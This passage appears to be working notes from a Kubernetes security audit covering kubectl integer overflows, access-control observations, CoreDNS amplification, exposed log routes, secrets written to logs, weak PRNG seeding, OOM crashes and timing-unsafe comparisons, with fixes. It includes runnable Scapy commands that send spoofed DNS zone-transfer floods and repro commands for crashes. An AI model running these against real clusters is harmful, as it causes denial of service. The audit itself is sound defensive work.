<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>
<p><em>Thank you for using nginx.</em></p>
</body>
</html>
root@k8s-1:/home/vagrant# kubectl expose deployment nginx-deployment --port 66666666666666 --target-port 80
The Service "nginx-deployment" is invalid: spec.ports[0].port: Invalid value: 184298154: must be between 1 and 65535, inclusive
The same validation exists for target-port (a check whether the port is in the 1 <= port <= 65535 range), but if we trigger an overflow here, we also get an extra stack trace (the same as before):
root@k8s-1:/home/vagrant# kubectl expose deployment nginx-deployment --port 66666666666666 --target-port 66666666666667
E0402 09:27:11.832160 4123 intstr.go:61] value: 66666666666667 overflows int32
goroutine 1 [running]:
runtime/debug.Stack(0xc000e30eb8, 0x556f36cd, 0xba2ce4369ebc04a)
/usr/local/go/src/runtime/debug/stack.go:24 +0xa7
k8s.io/kubernetes/vendor/k8s.io/apimachinery/pkg/util/intstr.FromInt(0x3ca20afc2aab, 0xe, 0x3ca20afc2aab, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/apimachinery/pkg/util/intstr/intstr.go:61 +0x62
k8s.io/kubernetes/pkg/kubectl/generate/versioned.generateService(0xc000b90990, 0x0, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/generate/versioned/service.go:199 +0x1056
k8s.io/kubernetes/pkg/kubectl/generate/versioned.ServiceGeneratorV2.Generate(0xc000b90990, 0x410bc20, 0x536d2d6, 0xa, 0xc000e31350)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/generate/versioned/service.go:50 +0x2b
k8s.io/kubernetes/pkg/kubectl/cmd/expose.(*ExposeServiceOptions).RunExpose.func1(0xc000b47730, 0x0, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:311 +0x45c
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.DecoratedVisitor.Visit.func1(0xc000b47730, 0x0, 0x0, 0x8, 0x10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:315 +0xdc
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.ContinueOnErrorVisitor.Visit.func1(0xc000b47730, 0x0, 0x0, 0x40a0000000000000, 0xc000e31838)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:339 +0x111
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.FlattenListVisitor.Visit.func1(0xc000b47730, 0x0, 0x0, 0x38, 0xc0002febc0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:377 +0x81b
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.(*Info).Visit(0xc000b47730, 0xc0002febc0, 0x0, 0x3500000000203000)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:92 +0x38
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.VisitorList.Visit(0xc000aee780, 0x1, 0x1, 0xc0002febc0, 0x571101, 0xc0002febc0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:177 +0x63
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.FlattenListVisitor.Visit(0x74a78e0, 0xc000b38580, 0x74bb200, 0xc00068b5e0, 0xc00105a840, 0xc000b38600, 0x1, 0xc000b38600)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:372 +0x86
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.ContinueOnErrorVisitor.Visit(0x74a78a0, 0xc000aa56b0, 0xc0002feb80, 0x7f987bbe4001, 0xc0002feb80)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:334 +0xc3
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.DecoratedVisitor.Visit(0x74a7820, 0xc000aee7a0, 0xc000b385c0, 0x3, 0x4, 0xc000b34d20, 0x0, 0xc000e31b68)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:306 +0x86
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.(*Result).Visit(0xc000305680, 0xc000b34d20, 0x10, 0x10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/result.go:99 +0x62
k8s.io/kubernetes/pkg/kubectl/cmd/expose.(*ExposeServiceOptions).RunExpose(0xc0003f5500, 0xc000f36c80, 0xc0007ee060, 0x2, 0x6, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:235 +0x2e7
k8s.io/kubernetes/pkg/kubectl/cmd/expose.NewCmdExposeService.func1(0xc000f36c80, 0xc0007ee060, 0x2, 0x6)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:138 +0x9d
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).execute(0xc000f36c80, 0xc0007ee000, 0x6, 0x6, 0xc000f36c80, 0xc0007ee000)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:760 +0x2cc
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).ExecuteC(0xc000ce0c80, 0x4, 0xc000ce0c80, 0xc000a09f10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:846 +0x2fd
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).Execute(0xc000ce0c80, 0x7, 0xc000a64f00)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:794 +0x2b
main.main()
_output/dockerized/go/src/k8s.io/kubernetes/cmd/hyperkube/main.go:64 +0x18f
The Service "nginx-deployment" is invalid:
* spec.ports[0].port: Invalid value: 184298154: must be between 1 and 65535, inclusive
* spec.ports[0].targetPort: Invalid value: 184298155: must be between 1 and 65535, inclusive
The overflow occurs in translateServicePortToTargetPort, which is called when kubectl port-forward is invoked on a service (note that it does not trigger when port-forwarding directly to a pod).
The code responsible for the overflow is here:
func translateServicePortToTargetPort(ports []string, svc corev1.Service, pod corev1.Pod) ([]string, error) {
var translated []string
for _, port := range ports {
localPort, remotePort := splitPort(port)
portnum, err := strconv.Atoi(remotePort)
// (...) // first conversion
containerPort, err := util.LookupContainerPortNumberByServicePort(svc, pod, int32(portnum))
// (...) // second conversion
if int32(portnum) != containerPort { // <-- overflow occurs here
The setup is the same as in the previous finding: we have a deployment and an exposed service.
Here we can see how it can be triggered - overflowing the target port:
^Croot@k8s-1:/home/vagrant# kubectl port-forward service/nginx-deployment 6666:4294973962
Forwarding from 127.0.0.1:6666 -> 80
It is also possible to overflow the host/local port, but there is a second validation here that prevents us from doing so:
root@k8s-1:/home/vagrant# kubectl port-forward service/nginx-deployment 4294973963
error: Service nginx-deployment does not have a service port 6667
root@k8s-1:/home/vagrant# kubectl port-forward service/nginx-deployment 4294973962
error: Error parsing local port '4294973962': strconv.ParseUint: parsing "4294973962": value out of range
As written before, the local port is parsed twice, and only the second validation is correct. The first validation occurs in translateServicePortToTargetPort (referenced before) and the second in getListener (vendor/k8s.io/client-go/tools/portforward/portforward.go:268). getListener creates a listener on the local machine that forwards the traffic to the given service.
The code for second validation can be seen here:
// getListener creates a listener on the interface targeted by the given hostname on the given port with
// the given protocol. protocol is in net.Listen style which basically admits values like tcp, tcp4, tcp6
func (pf *PortForwarder) getListener(protocol string, hostname string, port *ForwardedPort) (net.Listener, error) {
listener, err := net.Listen(protocol, net.JoinHostPort(hostname, strconv.Itoa(int(port.Local))))
if err != nil {
return nil, fmt.Errorf("Unable to create listener: Error %s", err)
}
listenerAddress := listener.Addr().String()
host, localPort, _ := net.SplitHostPort(listenerAddress)
localPortUInt, err := strconv.ParseUint(localPort, 10, 16)
if err != nil {
fmt.Fprintf(pf.out, "Failed to forward from %s:%d -> %d\n", hostname, localPortUInt, port.Remote)
return nil, fmt.Errorf("Error parsing local port: %s from %s (%s)", err, listenerAddress, host)
}
port.Local = uint16(localPortUInt)
if pf.out != nil {
fmt.Fprintf(pf.out, "Forwarding from %s -> %d\n", net.JoinHostPort(hostname, strconv.Itoa(int(localPortUInt))), port.Remote)
}
return listener, nil
}
While Kubernetes uses usernames for access control decisions and in request logging, it does not have a user object nor does it store usernames or other information about users in its object store.
This seems like a golden egg for confused deputy attacks...
Also, look at the section in the RBAC docs on running parallel authorizers; that sounds incredibly dangerous...
Attribute-Based Access Control (ABAC) is one of the two primary AC/authZ systems that ships with k8s, the other being RBAC. Some thoughts:
- The file format is one JSON object per line. There should be no enclosing list or map, just one map per line. Basically they use a bufio.Scanner to read in one JSON object per line.
- The wildcard works across namespaces, pods, &c.; a malicious internal attacker can simply grant themselves perms across namespaces when they should be limited to a specific one, and the onus is on the admin to make sure the policies are correct... i.e. you can't really trust them at all.
- Service accounts default to the format system:serviceaccount:<namespace>:default for the namespace.
Role-Based Access Control (RBAC) is the other main AC/authZ system within k8s. Generally, the RBAC system seems to be a bit more robust than the ABAC system; for example, Roles are split from ClusterRoles, which apply across the system. An admin who wants to audit the resources can easily check if something includes a ClusterRole and deny the application... The default roles are cluster-admin, admin, edit, and view, atop the various system: roles.
kubectl whoami is extremely interesting. Again, users and roles "aren't a thing" for the cluster, or even other authorizers, so they want to avoid conflation... Note also kubectl auth --as ... and kubectl login, which also have some interesting implications.
k8s logs the bearer token at verbosity level 10; I don't really care about the logging level, it should never log full auth tokens or creds.
I think we can take advantage of the implicit widening to a 64-bit int in the initial comparison, followed by the explicit int32() cast occurring right before the status update. Need to research this a bit more.
func storeDaemonSetStatus(dsClient unversionedapps.DaemonSetInterface, ds *apps.DaemonSet, desiredNumberScheduled, currentNumberScheduled, numberMisscheduled, numberReady, updatedNumberScheduled, numberAvailable, numberUnavailable int, updateObservedGen bool) error {
if int(ds.Status.DesiredNumberScheduled) == desiredNumberScheduled &&
int(ds.Status.CurrentNumberScheduled) == currentNumberScheduled &&
int(ds.Status.NumberMisscheduled) == numberMisscheduled &&
int(ds.Status.NumberReady) == numberReady &&
int(ds.Status.UpdatedNumberScheduled) == updatedNumberScheduled &&
int(ds.Status.NumberAvailable) == numberAvailable &&
int(ds.Status.NumberUnavailable) == numberUnavailable &&
ds.Status.ObservedGeneration >= ds.Generation {
return nil
}
toUpdate := ds.DeepCopy()
var updateErr, getErr error
for i := 0; i < StatusUpdateRetries; i++ {
if updateObservedGen {
toUpdate.Status.ObservedGeneration = ds.Generation
}
toUpdate.Status.DesiredNumberScheduled = int32(desiredNumberScheduled)
toUpdate.Status.CurrentNumberScheduled = int32(currentNumberScheduled)
toUpdate.Status.NumberMisscheduled = int32(numberMisscheduled)
toUpdate.Status.NumberReady = int32(numberReady)
toUpdate.Status.UpdatedNumberScheduled = int32(updatedNumberScheduled)
toUpdate.Status.NumberAvailable = int32(numberAvailable)
toUpdate.Status.NumberUnavailable = int32(numberUnavailable)
...
func findEnv(env []v1.EnvVar, name string) (v1.EnvVar, bool) {
for _, e := range env {
if e.Name == name {
return e, true
}
}
return v1.EnvVar{}, false
}
func updateEnv(existing []v1.EnvVar, env []v1.EnvVar, remove []string) []v1.EnvVar {
out := []v1.EnvVar{}
covered := sets.NewString(remove...)
for _, e := range existing {
if covered.Has(e.Name) {
continue
}
newer, ok := findEnv(env, e.Name)
if ok {
covered.Insert(e.Name)
out = append(out, newer)
continue
}
out = append(out, e)
}
for _, e := range env {
if covered.Has(e.Name) {
continue
}
covered.Insert(e.Name)
out = append(out, e)
}
return out
}
A host within a kubernetes cluster can cause the CoreDNS services to utilize excessive system resources (CPU). For example, in the following image it was possible to cause both instances of CoreDNS running on the kubernetes cluster to utilize over 100% CPU:
This example was possible by sending a DNS zone transfer request to one instance (10.40.0.1) with a spoofed source IP of the second instance (10.40.0.2), causing the first instance to send unsolicited traffic to the second, as seen in the following packet capture:
IP 10.40.0.2.53 > 10.40.0.1.53: 0 AXFR? cluster.local. (31)
IP 10.40.0.1.53 > 10.40.0.2.53: 0*-| 6/0/0 SOA, SRV kube-dns.kube-system.svc.cluster.local.:53 0 100, SRV kube-dns.kube-system.svc.cluster.local.:53 0 100, SRV kube-dns.kube-system.svc.cluster.local.:53 0 100, SRV kube-dns.kube-system.svc.cluster.local.:53 0 100, SRV kubernetes-dashboard.kube-system.svc.cluster.local.:443 0 100 (457)
IP 10.40.0.1.53 > 10.40.0.2.53: 0* 0/1/0 (124)
IP 10.40.0.2.53 > 10.40.0.1.53: 0 FormErr- [0q] 0/0/0 (12)
The attack can be amplified by executing against both exposed DNS services, allowing an attacker to cause both instances of CoreDNS to "attack" each other.
Run the following Scapy (https://github.com/secdev/scapy/) commands in two separate instances:
send(IP(dst="10.40.0.2", src="10.40.0.1")/UDP(dport=53,sport=53)/str(DNS(rd=0, qd=DNSQR(qtype="AXFR",qname='cluster.local.'))),count=-1)
send(IP(dst="10.40.0.1", src="10.40.0.2")/UDP(dport=53,sport=53)/str(DNS(rd=0, qd=DNSQR(qtype="AXFR",qname='cluster.local.'))),count=-1)
A malicious pod within the kubernetes cluster sends spoofed DNS requests to the CoreDNS services, consuming system resources, potentially leading to a denial of service condition against the DNS services.
Access to the CoreDNS service should be restricted to a load balanced front end, prohibiting direct access to the underlying nodes. This will prevent a malicious host from being able to target a single instance within the cluster as well as remove the ability of an attacker to amplify an attack by spoofing the source IP.
Internal Attacker describes a position in which an unprivileged attacker has successfully transited external boundaries and established themselves on an internal resource, such as a container.
func (l *SSHTunnelList) Dial(ctx context.Context, net, addr string) (net.Conn, error) {
start := time.Now()
id := mathrand.Int63() // So you can match begins/ends in the log.
klog.Infof("[%x: %v] Dialing...", id, addr)
defer func() {
klog.Infof("[%x: %v] Dialed in %v.", id, addr, time.Since(start))
}()
tunnel, err := l.pickTunnel(strings.Split(addr, ":")[0])
if err != nil {
return nil, err
}
return tunnel.Dial(ctx, net, addr)
}
func (l *SSHTunnelList) pickTunnel(addr string) (tunnel, error) {
l.tunnelsLock.Lock()
defer l.tunnelsLock.Unlock()
if len(l.entries) == 0 {
return nil, fmt.Errorf("No SSH tunnels currently open. Were the targets able to accept an ssh-key for user %q?", l.user)
}
// Prefer same tunnel as kubelet
// TODO: Change l.entries to a map of address->tunnel
for _, entry := range l.entries {
if entry.Address == addr {
return entry.Tunnel, nil
}
}
klog.Warningf("SSH tunnel not found for address %q, picking random node", addr)
n := mathrand.Intn(len(l.entries))
return l.entries[n].Tunnel, nil
}
they pick a random SSH tunnel to use, which may or may not be the one the kubelet is using
The Kubernetes system allows users to set up a PKI, but in many cases fails to use authenticated TLS between components, which negates any benefit to using a PKI.
For example, the following connections do not use authenticated HTTPS:
This failure to authenticate components within the system is extremely dangerous and should be changed to use authenticated HTTPS by default. The lack of authentication for etcd alone has led to major vulnerabilities in a wide variety of applications.
The kube-apiserver runs within the control plane of a Kubernetes cluster and acts as the central authority on cluster state. Part of its functionality is serving files in /var/log from the /logs[/{logpath:*}] routes of the kube-apiserver. It can be accessed at <host with api server>:6443/logs with an authenticated client (achievable through kubectl proxy), and is on by default. These endpoints are defined within kubernetes/pkg/routes/logs.go as follows.
// Logs adds handlers for the /logs path serving log files from /var/log.
type Logs struct{}
func (l Logs) Install(c *restful.Container) {
// use restful: ws.Route(ws.GET("/logs/{logpath:*}").To(fileHandler))
// See github.com/emicklei/go-restful/blob/master/examples/restful-serve-static.go
ws := new(restful.WebService)
ws.Path("/logs")
ws.Doc("get log files")
ws.Route(ws.GET("/{logpath:*}").To(logFileHandler).Param(ws.PathParameter("logpath", "path to the log").DataType("string")))
ws.Route(ws.GET("/").To(logFileListHandler))
c.Add(ws)
}
func logFileHandler(req *restful.Request, resp *restful.Response) {
logdir := "/var/log"
actual := path.Join(logdir, req.PathParameter("logpath"))
http.ServeFile(resp.ResponseWriter, req.Request, actual)
}
func logFileListHandler(req *restful.Request, resp *restful.Response) {
logdir := "/var/log"
http.ServeFile(resp.ResponseWriter, req.Request, logdir)
}
These endpoints are then registered within the master (k8s.io/kubernetes/pkg/master/master.go).
if c.ExtraConfig.EnableLogsSupport {
routes.Logs{}.Install(s.Handler.GoRestfulContainer)
}
The kube-apiserver configuration has this endpoint enabled by default:
$ hyperkube kube-apiserver --help | grep logs
--enable-logs-handler If true, install a /logs handler for the apiserver logs. (default true)
This functionality allows an attacker with privileged access to the Kubernetes cluster to view logs of the host running the kube-apiserver, which may contain privileged information.
To authenticate requests, we can leverage kubectl proxy
:
$ kubectl proxy
Starting to serve on 127.0.0.1:8001
We can then perform a request to the kube-apiserver
defined within the kubeconfig
that the kubectl proxy
is leveraging for authentication:
$ curl "127.0.0.1:8001/logs/"
<pre>
<a href="lol/">lol/</a>
<a href="test">test</a>
</pre>
Traversal can then be performed based on the logpath
route parameter:
$ curl "127.0.0.1:8001/logs/lol/"
<pre>
<a href="haha/">haha/</a>
</pre>
File contents can also be viewed:
$ curl "127.0.0.1:8001/logs/test"
lol
Initially it was believed that parent directory traversal may be possible. However, the use of http.ServeFile
and the use of a path parameter instead of query parameter for logpath
prevent parent directory traversals.
The ServeFile
function of the standard library is defined as follows.
func ServeFile(w ResponseWriter, r *Request, name string) {
if containsDotDot(r.URL.Path) {
// Too many programs use r.URL.Path to construct the argument to
// serveFile. Reject the request under the assumption that happened
// here and ".." may not be wanted.
// Note that name might not contain "..", for example if code (still
// incorrectly) used filepath.Join(myDir, r.URL.Path).
Error(w, "invalid URL path", StatusBadRequest)
return
}
dir, file := filepath.Split(name)
serveFile(w, r, Dir(dir), file, false)
}
Within this function, the request path is checked to see if there are any ..
characters in the path through the use of the containsDotDot
function below.
func containsDotDot(v string) bool {
if !strings.Contains(v, "..") {
return false
}
for _, ent := range strings.FieldsFunc(v, isSlashRune) {
if ent == ".." {
return true
}
}
return false
}
This function will break the path up based on slash runes (defined in isSlashRune
below), searching for any parts of the path which contain ..
.
func isSlashRune(r rune) bool { return r == '/' || r == '\\' }
Bringing this all together: because logpath is a path parameter, the http.ServeFile function checks the entire request path for .. using containsDotDot. If the path contains .., the file specified by logpath is not returned, mitigating parent directory traversal.
There's probably a ton of these that we can find, but:
// InClusterConfig returns a config object which uses the service account
// kubernetes gives to pods. It's intended for clients that expect to be
// running inside a pod running on kubernetes. It will return ErrNotInCluster
// if called from a process not running in a kubernetes environment.
func InClusterConfig() (*Config, error) {
const (
tokenFile = "/var/run/secrets/kubernetes.io/serviceaccount/token"
rootCAFile = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
)
The default service account token doesn't have an expiration date (it can be obtained, e.g., with kubectl get secret -o json).
On the other hand, it seems that if you create a token yourself, you can set one: https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#service-account-token-volume-projection
The kubectl apply command is vulnerable to an OOM due to fully reading a podspec. Despite there being a limit on the size of a podspec, kubectl attempts to read the entire podspec before validating it. Thus, an arbitrarily sized file can be provided until OOM is reached. Triggering this remotely from a web resource is more resource efficient, since the response can be streamed infinitely to trigger the OOM, removing the constraint of keeping a large podspec on disk.
This works with both local and remote (http(s)) podspecs.
Repro information is below, run on one of the master nodes (which is what the second snippet is referencing). If run on a master, this will result in a crash of the containers on that machine.
root@node1:/home/ubuntu# kubectl apply -f env_pod_524288000_0.yaml
Killed
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Warning SystemOOM 82s (x31 over 3m53s) kubelet, node1 System OOM encountered
In its current state, Kubernetes does not support certificate revocation. Therefore, users must regenerate the entire cert chain to remove a certificate from the system. This has been documented in an open issue and addressed elsewhere here.
Eve successfully gains access to a node in Bob's Kubernetes cluster. Bob wants to revoke that node's certificate so that it is not viewed as valid by the rest of the system, while also not incurring the cost of regenerating the certificate tree. This is not possible, and Eve is able to maliciously control the node until Bob updates the entire cluster.
There are two options for supporting certificate revocation. One involves all nodes maintaining a certificate revocation list (CRL) that must be checked whenever they are presented with a certificate.
Another option is OCSP stapling. Here, the CRL is held by an OCSP server, which the owner of the cluster can use to revoke certificates. Each certificate holder periodically queries the OCSP server to get timestamped evidence that its certificate is still valid.
We believe using OCSP stapling, where the apiserver functions as the OCSP responder and the CRL is stored in etcd, is the best solution to this problem. This way, users can simply update the CRL, and all nodes will periodically ask the apiserver for an updated timestamp proving their cert is still valid. Our approach incurs minimal overhead and uses tools readily available in the Go ecosystem.
// CheckClusterHealth makes sure:
// - the API /healthz endpoint is healthy
// - all master Nodes are Ready
// - (if self-hosted) that there are DaemonSets with at least one Pod for all control plane components
// - (if static pod-hosted) that all required Static Pod manifests exist on disk
func CheckClusterHealth(client clientset.Interface, ignoreChecksErrors sets.String) error {
fmt.Println("[upgrade] Making sure the cluster is healthy:")
healthChecks := []preflight.Checker{
&healthCheck{
name: "APIServerHealth",
client: client,
f: apiServerHealthy,
},
&healthCheck{
name: "MasterNodesReady",
client: client,
f: masterNodesReady,
},
// TODO: Add a check for ComponentStatuses here?
}
healthChecks = append(healthChecks, &healthCheck{
name: "StaticPodManifest",
client: client,
f: staticPodManifestHealth,
})
return preflight.RunChecks(healthChecks, os.Stderr, ignoreChecksErrors)
}
Kubernetes can be configured to use iSCSI volumes. When using CHAP authentication, the CHAP secrets are stored using the Secret API. Example:
https://github.com/kubernetes/examples/blob/master/staging/volumes/iscsi/chap-secret.yaml
When a pod is configured to use iSCSI and the AttachDisk method is called, the following code from kubernetes/pkg/volume/iscsi/iscsi_util.go runs:
var (
chapSt = []string{
"discovery.sendtargets.auth.username",
"discovery.sendtargets.auth.password",
"discovery.sendtargets.auth.username_in",
"discovery.sendtargets.auth.password_in"}
chapSess = []string{
"node.session.auth.username",
"node.session.auth.password",
"node.session.auth.username_in",
"node.session.auth.password_in"}
ifaceTransportNameRe = regexp.MustCompile(`iface.transport_name = (.*)\n`)
ifaceRe = regexp.MustCompile(`.+/iface-([^/]+)/.+`)
)
func updateISCSIDiscoverydb(b iscsiDiskMounter, tp string) error {
if !b.chapDiscovery {
return nil
}
out, err := b.exec.Run("iscsiadm", "-m", "discoverydb", "-t", "sendtargets", "-p", tp, "-I", b.Iface, "-o", "update", "-n", "discovery.sendtargets.auth.authmethod", "-v", "CHAP")
if err != nil {
return fmt.Errorf("iscsi: failed to update discoverydb with CHAP, output: %v", string(out))
}
for _, k := range chapSt {
v := b.secret[k]
if len(v) > 0 {
out, err := b.exec.Run("iscsiadm", "-m", "discoverydb", "-t", "sendtargets", "-p", tp, "-I", b.Iface, "-o", "update", "-n", k, "-v", v)
if err != nil {
return fmt.Errorf("iscsi: failed to update discoverydb key %q with value %q error: %v", k, v, string(out))
}
}
}
return nil
}
func updateISCSINode(b iscsiDiskMounter, tp string) error {
if !b.chapSession {
return nil
}
out, err := b.exec.Run("iscsiadm", "-m", "node", "-p", tp, "-T", b.Iqn, "-I", b.Iface, "-o", "update", "-n", "node.session.auth.authmethod", "-v", "CHAP")
if err != nil {
return fmt.Errorf("iscsi: failed to update node with CHAP, output: %v", string(out))
}
for _, k := range chapSess {
v := b.secret[k]
if len(v) > 0 {
out, err := b.exec.Run("iscsiadm", "-m", "node", "-p", tp, "-T", b.Iqn, "-I", b.Iface, "-o", "update", "-n", k, "-v", v)
if err != nil {
return fmt.Errorf("iscsi: failed to update node session key %q with value %q error: %v", k, v, string(out))
}
}
}
return nil
}
These two functions both iterate over a slice of keys that reference secrets in a map, which are then used to generate iscsiadm commands. As shown, if executing these commands fails, errors are returned with both the key and the secret value in the error string. These errors are eventually logged using klog:
if lastErr != nil {
klog.Errorf("iscsi: last error occurred during iscsi init:\n%v", lastErr)
}
Someone with access to these logs would be able to view the sensitive secrets and potentially gain access to iSCSI volumes.
Many services seed the non-cryptographic PRNG (math/rand) using the system time, allowing an attacker to predict certain random values.
Many services including kubelet
, api-server
, kube-scheduler
, kube-proxy
seed the random number generator in the following manner.
rand.Seed(time.Now().UnixNano())
This is generally fine since the code properly uses crypto/rand
for cryptographic operations like key generations. No cryptographic primitives were observed incorrectly using math/rand
.
However, it can make certain identifiers predictable and simplify aspects of an exploitation chain. In the following example, the node is assigned a random name that could be guessable to an attacker who knows uptime information.
func (kubemarkController *KubemarkController) addNodeToNodeGroup(nodeGroup string) error {
node := kubemarkController.nodeTemplate.DeepCopy()
...
node.Name = fmt.Sprintf("%s-%d", nodeGroup, kubemarkController.rand.Int63())
...
client.CoreV1().ReplicationControllers(node.Namespace).Create(node)
}
If an attacker needs to know the name or identifier of a service/pod/node that is infeasible to brute force, the attacker may be able to deduce the uptime from the current environment and smartly enumerate possible seeds and narrow the space of possible names/identifiers.
Seed the random number generator using a less predictable seed similar to the following.
import (
"encoding/binary"
"math/rand"
srand "crypto/rand"
)
func InitSeed() (err error){
b := make([]byte, 8)
_, err = srand.Read(b)
if err == nil {
rand.Seed(int64(binary.LittleEndian.Uint64(b[:])))
}
return err
}
The original vulnerability was reported at https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/.
The fix was introduced in 1.13.5, although it is incomplete and still allows arbitrary file overwrites.
Vulnerable (1.13.4): https://github.com/kubernetes/kubernetes/blob/v1.13.4/pkg/kubectl/cmd/cp/cp.go#L448
"Fixed" (1.13.5): https://github.com/kubernetes/kubernetes/blob/v1.13.5/pkg/kubectl/cmd/cp/cp.go#L460
There appears to be a hierarchy of Deployment -> ReplicaSet, but the ReplicaSet and ReplicationController are on the same management level, just with different Pod label targeting methods. My concern is a Deployment attempting to manage N ReplicaSets which manage a particular Pod label, and a ReplicationController which is attempting to manage another particular label, and you have a Pod with both labels. Subsequently, the Deployment attempts to create a new ReplicaSet, spinning up a new version of a Pod into it, then removing the old Pod. However, when the Deployment attempts to remove the old Pod, the ReplicationController notices the label it's targeting is below desired, and spins it back up. This results in the Deployment fighting against the ReplicationController, potentially failing the Deployment because it can't remove all instances of the previous version (since this is relevant to the maxSurge and maxUnavailable attributes of a Deployment's rollingUpdate settings).
This needs testing & further investigation this week. Should be pretty easy to test; the theoretical idea being:
1. Create a Deployment managing all pods in a namespace with the label "app1=foo".
2. Create a ReplicationController managing all pods in a namespace with the label "app2=bar".
3. Label the Deployment-managed pods with "app2=bar".
4. Trigger the Deployment to redeploy the "app1=foo" pods.
5. Observe whether the ReplicationController attempts to keep the "app1=foo","app2=bar" pod alive, preventing the Deployment from completing the rolling upgrade to the new ReplicaSet, specifically during downscaling of the old ReplicaSet.
The attack vector here is an attacker who has internal cluster access and is able to interface with the kube-apiserver. This could be a method to prevent cluster operators from patching the entry point in the application which allowed the attacker in, since a deployment would not be able to finish successfully.
Terraform has HTTP Basic Auth as a default type; we need to look into this more and see what in k8s enables that (and why it exists):
https://www.terraform.io/docs/providers/kubernetes/index.html#authentication
Add this to next week's findings...
When using a password (basic auth) or a static token file (token auth) the API server does not perform a secure comparison of secret values. In theory, this could allow an attacker to perform a timing attack on the comparison.
When using a password for authentication, a standard string comparison occurs. When using a token file, a map is checked by key, which ultimately becomes a string comparison. Ideally, a constant-time comparison would be used: https://golang.org/pkg/crypto/subtle/#ConstantTimeCompare.
github.com/kubernetes/kubernetes/staging/src/k8s.io/apiserver/plugin/pkg/authenticator/password/passwordfile/passwordfile.go
func (a *PasswordAuthenticator) AuthenticatePassword(ctx context.Context, username, password string) (*authenticator.Response, bool, error) {
user, ok := a.users[username]
if !ok {
return nil, false, nil
}
if user.password != password {
return nil, false, nil
}
return &authenticator.Response{User: user.info}, true, nil
}
github.com/kubernetes/kubernetes/staging/src/k8s.io/apiserver/pkg/authentication/token/tokenfile/tokenfile.go
